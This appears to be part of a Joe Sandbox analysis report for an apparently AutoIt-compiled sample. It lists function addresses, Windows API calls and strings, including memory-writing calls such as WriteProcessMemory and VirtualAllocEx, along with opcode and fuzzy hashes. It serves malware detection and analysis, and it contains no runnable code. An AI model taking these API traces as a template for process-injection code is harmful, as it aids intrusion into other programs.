Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _memmove
String ID: 3c&$_&
API String ID: 4104443479-1388094336
Opcode ID: 6cdb56a8f151158388650f7cfcb0fabc5f4ec4bc48b7198a83e781d8206d22b9
Instruction ID: c6c7032c2aeb7f6a78cf79d3d31691c7b6fdd427fe4c26a709d4ba3060191969
Opcode Fuzzy Hash: 6cdb56a8f151158388650f7cfcb0fabc5f4ec4bc48b7198a83e781d8206d22b9
Instruction Fuzzy Hash: 93519D7091061A9FCF20CF68C884AAEBBF1FF45304F258529E85AD7250EB31A9A5CF51

Function 002A97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002B14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002A9296,?,?,00000034,00000800,?,00000034), ref: 002B14E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002A983F

Part of subcall function 002B1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002A92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 002B14B1

Part of subcall function 002B13DE: GetWindowThreadProcessId.USER32(?,?), ref: 002B1409
Part of subcall function 002B13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,002A925A,00000034,?,?,00001004,00000000,00000000), ref: 002B1419
Part of subcall function 002B13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,002A925A,00000034,?,?,00001004,00000000,00000000), ref: 002B142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002A98AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002A98F9

Strings

@, xrefs: 002A9911

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: e280bd88e1f728232816caa312d46e97dba74c5ee79c200d856cd2026b4af82b
Instruction ID: e5714892f4e3dfcc1ba98fcb9ce83606770cd2f5423879b080cb25ffd3adb223
Opcode Fuzzy Hash: e280bd88e1f728232816caa312d46e97dba74c5ee79c200d856cd2026b4af82b
Instruction Fuzzy Hash: 13415B76901219BFCB10DFA4CD95ADEBBB8EF0A340F004099FA55B7181DA706E95CFA0

Function 002D7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,002DF910,00000000,?,?,?,?), ref: 002D79DF
GetWindowLongW.USER32 ref: 002D79FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 002D7A0C

Strings

SysTreeView32, xrefs: 002D79B1

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 82952c7190abdb2d10e50c98fed8d33c7df795e46ac1a601a0682689b2a2b266
Instruction ID: 35ff9d68b6218f08139951bf39370542d86f133d4a01432e21aa290e9308b1b5
Opcode Fuzzy Hash: 82952c7190abdb2d10e50c98fed8d33c7df795e46ac1a601a0682689b2a2b266
Instruction Fuzzy Hash: D731E132224606AFDB118F38DC45BEA77A9EB09334F244726F875932E0E734ED608B50

Function 002D73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002D7461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002D7475
SendMessageW.USER32(?,00001002,00000000,?), ref: 002D7499

Strings

SysMonthCal32, xrefs: 002D742C

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: c8b88c836f27c4e6b25340b06e62f97f9ce97e2a6c66ec6083467ef11c86e6ec
Instruction ID: 0f418cf33f186ca33251248aa0fc4eb72d2c6e6974394d7f30f676e0774af34c
Opcode Fuzzy Hash: c8b88c836f27c4e6b25340b06e62f97f9ce97e2a6c66ec6083467ef11c86e6ec
Instruction Fuzzy Hash: F421A132510219AFDF128F64DC46FEA3B79EF48724F110215FE156B2D0EAB5AC61DBA0

Function 002D6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002D6D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002D6D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 002D6D70

Strings

Listbox, xrefs: 002D6D08

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 93f71d55e120beae216f71375e3de365952d7ba7e79358d39c03a76c50e69a62
Instruction ID: c9168f7f7c962dbd8385a7b6c876fda5e9e0e7946bf6daeadd1a1868ad0bb99e
Opcode Fuzzy Hash: 93f71d55e120beae216f71375e3de365952d7ba7e79358d39c03a76c50e69a62
Instruction Fuzzy Hash: 6D21D432621119BFDF128F54DC49FFB3BBAEF89750F018126F9459B2A0C6719C618BA0

Function 002C39E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 002C3A66

Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22

Strings

, $, xrefs: 002C3AA6
%., xrefs: 002C39F4
AUTOITCALLVARIABLE%d, xrefs: 002C3A58

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d$%.
API String ID: 3506404897-205648231
Opcode ID: 7893c0aff90e01a5b57c8747887ba5d496b6705264993beef8166f21b99ad066
Instruction ID: ac1703969b7c370dbb7c38a49532286acafb2ff38e1d59132c0babccbaa25257
Opcode Fuzzy Hash: 7893c0aff90e01a5b57c8747887ba5d496b6705264993beef8166f21b99ad066
Instruction Fuzzy Hash: 8D219131620219AFCF15EF64CC92EAE77B5AF44301F004859F845AB281DB70EA75CF65

Function 002D770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002D7772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002D7787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 002D7794

Strings

msctls_trackbar32, xrefs: 002D7749

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 66a682e363ea50406f92c93e65753c3fdc9569a0815a4bf83b02fe0a5014a88c
Instruction ID: a97475bb5f2f148f2374ee3fc245b0ee4320b151e1c110ea97af50182de787e8
Opcode Fuzzy Hash: 66a682e363ea50406f92c93e65753c3fdc9569a0815a4bf83b02fe0a5014a88c
Instruction Fuzzy Hash: 5211E772264209BEEF105F65CC05FDB776DEF88B54F114519FA45961D0D671EC21CB10

Function 00276B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00276B93
__calloc_crt.LIBCMT ref: 00276BAC

Strings

0, xrefs: 00276BD1
@B1, xrefs: 00276BC3

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: __calloc_crt
String ID: 0$@B1
API String ID: 3494438863-589020848
Opcode ID: 6706b2b01d8604af31e2b6d4a7b17dbd721213f89e6e34c003c40ffc2c6dcfd5
Instruction ID: fcafaea752801727749b0f19c8a29996633edb95074408ba167a920ffaebc435
Opcode Fuzzy Hash: 6706b2b01d8604af31e2b6d4a7b17dbd721213f89e6e34c003c40ffc2c6dcfd5
Instruction Fuzzy Hash: 70F0C876325E12CBF7298F55BC55B926799E785334F50C81AE108EE1C0EB74885246D0

Function 00254C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00254B83,?), ref: 00254C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00254C56

Strings

kernel32.dll, xrefs: 00254C3F
Wow64RevertWow64FsRedirection, xrefs: 00254C50

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: a3f99d3a9d3e4d32b72e212972fcd4bab00fb388d92e1f8971a1901b88e0a622
Instruction ID: c301d5fed1bd705e21de795d80d7b5a533e79e826ed4a58c27b34064639c61df
Opcode Fuzzy Hash: a3f99d3a9d3e4d32b72e212972fcd4bab00fb388d92e1f8971a1901b88e0a622
Instruction Fuzzy Hash: 1AD01230921713CFD7205F31DA0C646B7D4AF05356B15883BD997D65A4E770DCD0CA54

Function 00254C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00254BD0,?,00254DEF,?,003152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00254C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00254C23

Strings

kernel32.dll, xrefs: 00254C0C
Wow64DisableWow64FsRedirection, xrefs: 00254C1D

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: fe9d973f41d811202b522dbdedf3033a7513dc9429465a910d06bee1bf6256a5
Instruction ID: 54b6fa03069a37384acd6f54bdbcffa23cd4e79d82ee66b94a5bd5977a8cef8c
Opcode Fuzzy Hash: fe9d973f41d811202b522dbdedf3033a7513dc9429465a910d06bee1bf6256a5
Instruction Fuzzy Hash: EDD0EC30926713CFD7206F71DA08646B6E5AF0A756B15883B9896D6190E6B0D8908A54

Function 002D0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,002D1039), ref: 002D0DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002D0E07

Strings

advapi32.dll, xrefs: 002D0DF0
RegDeleteKeyExW, xrefs: 002D0E01

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: fc6d47c8f25be66178d66266a9ebf7415c0ae61d92faf9a73c2d6e60ad1b5cd5
Instruction ID: 2b5be65c6440d9a46f2903df9131be5703abf9f2f3217bb4e275a4f1b8ee2717
Opcode Fuzzy Hash: fc6d47c8f25be66178d66266a9ebf7415c0ae61d92faf9a73c2d6e60ad1b5cd5
Instruction Fuzzy Hash: 7AD08230821323CFC3218F72D84838A73E8AF01342F008C2FD88AC22A0E6B0DCA08A14

Function 002C90E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,002C8CF4,?,002DF910), ref: 002C90EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 002C9100

Strings

GetModuleHandleExW, xrefs: 002C90FA
kernel32.dll, xrefs: 002C90E9

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 454e407bdc4430438be737576721166b290f816a47dcb1cd9cb20ddf4213fd08
Instruction ID: 2a635e33d4beeb730aa709824755888f2896c067ce83815de14ffd256e9464ef
Opcode Fuzzy Hash: 454e407bdc4430438be737576721166b290f816a47dcb1cd9cb20ddf4213fd08
Instruction Fuzzy Hash: B9D01234921713CFD7209F31E91D64676D5AF05355B15883FD49AD6590E7B0C8D0C690

Function 00291714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00291718
__swprintf.LIBCMT ref: 00291749

Strings

%.3d, xrefs: 00291723
WIN_XPe, xrefs: 00291788

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 26168a253722b5a2fa29d4fe65c4505ec3398d1d4ce3a1315bbc455766da1985
Instruction ID: 23e541b17f297bbd4f47d6d745b827c5068203aadc7ee4c83079a269643b212e
Opcode Fuzzy Hash: 26168a253722b5a2fa29d4fe65c4505ec3398d1d4ce3a1315bbc455766da1985
Instruction Fuzzy Hash: 8BD01271C3510BEACF0496D298998F9B37CAB08701F500452F90692080E3B18B74EA25

Function 002A717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9f70dedeaf50ff2409d2c06a6da3f4c078c3d8cb03d974fa6f8cef23b1b8378
Instruction ID: 4caefed0000f1bf44a10af7e48b80ec5f5d1824d60ec60fb36f480d4405cbc09
Opcode Fuzzy Hash: f9f70dedeaf50ff2409d2c06a6da3f4c078c3d8cb03d974fa6f8cef23b1b8378
Instruction Fuzzy Hash: D7C18D74A14216EFCB14CFA4CC84EAEBBB5FF49304B158598E805EB251DB30ED91DB94

Function 002CE02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 002CE0BE
CharLowerBuffW.USER32(?,?), ref: 002CE101

Part of subcall function 002CD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 002CD7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 002CE301
_memmove.LIBCMT ref: 002CE314

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 25fd7ab1d82d5c3fb2f1fcb6d9a9c2bb71dda8f5885050fb4b7d87306f1b4ae9
Instruction ID: 0cc57477abb52c2dc22433b902088b16da0872285e7814b99a7aa2b77b764ddd
Opcode Fuzzy Hash: 25fd7ab1d82d5c3fb2f1fcb6d9a9c2bb71dda8f5885050fb4b7d87306f1b4ae9
Instruction Fuzzy Hash: 71C135716283019FCB14DF28C480A6ABBE4FF89314F058A6EF8999B351D770E955CF82

Function 002C8093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 002C80C3
CoUninitialize.OLE32 ref: 002C80CE

Part of subcall function 002AD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002AD5D4

VariantInit.OLEAUT32(?), ref: 002C80D9
VariantClear.OLEAUT32(?), ref: 002C83AA

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: b9449bcd650acce8ca0274e6c95e9b417f2742eea5e1e2bf15732dc4a8245145
Instruction ID: 78a81d6aeb0cdad1aad1064be64f70c8d78d48b4ae7bcf576f38363d5470593c
Opcode Fuzzy Hash: b9449bcd650acce8ca0274e6c95e9b417f2742eea5e1e2bf15732dc4a8245145
Instruction Fuzzy Hash: 32A14535624B419FCB00DF54C885B2AB7E4BF89314F08854DF99A9B3A1CB70EC54CB86

Function 002A687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 002A688E
SysAllocString.OLEAUT32(00000000), ref: 002A6937
VariantCopy.OLEAUT32 ref: 002A6966
VariantClear.OLEAUT32(?), ref: 002A698D

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 47da94fabbd5cded9c471ee2bbd665959d0bda700b3f7fd5eb6076ed2b34af18
Instruction ID: b46a0be22e13801cad86e9579a443a88f49a79ec519d8a47ef6c1a656b55e7ed
Opcode Fuzzy Hash: 47da94fabbd5cded9c471ee2bbd665959d0bda700b3f7fd5eb6076ed2b34af18
Instruction Fuzzy Hash: 4251E774730702DFDB209F65D499A2AB3E5AF56310F28C81FE586D7292DF74D8A48B04

Function 002D97F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(013EE630,?), ref: 002D9863
ScreenToClient.USER32(00000002,00000002), ref: 002D9896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 002D9903

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: cae2635b47584280889c01ea16401fa5f244374a636d4fb5f0c109a1a35ce20a
Instruction ID: a9ee5a4895a2a7b719f2d5b37345185a31b61cb132252a5a57520a4cb0a48f8a
Opcode Fuzzy Hash: cae2635b47584280889c01ea16401fa5f244374a636d4fb5f0c109a1a35ce20a
Instruction Fuzzy Hash: E1515E34A10209EFCB10CF18D894AAE7BB5FF45760F14815AF8659B3A0D731AD91DB90

Function 002A9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

